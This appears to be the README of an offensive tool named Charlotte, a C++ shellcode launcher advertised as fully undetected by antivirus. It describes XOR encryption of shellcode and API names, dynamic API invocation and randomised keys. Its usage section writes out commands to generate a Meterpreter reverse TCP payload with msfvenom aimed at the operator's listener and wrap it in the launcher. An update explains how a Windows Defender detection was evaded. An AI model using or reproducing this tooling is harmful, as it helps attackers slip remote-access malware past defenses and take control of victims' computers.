Charlotte : C++ Fully Undetected Shellcode Launcher

Charlotte is an c++ fully undetected shellcode launcher .

Description

  • 13/05/2021:
    • c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
    • dynamic invoking of win32 api functions
    • XOR encryption of shellcode and function names
    • randomised XOR keys and variables per run
    • on Kali Linux, simply ‘apt-get install mingw-w64*’ and thats it!
  • 17/05/2021:
    • random strings length and XOR keys length

Antiscan.me

Usage

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py

Example:

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload

Update v1.1

17/05/21:

Apparently Microsoft Windows Defender was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers.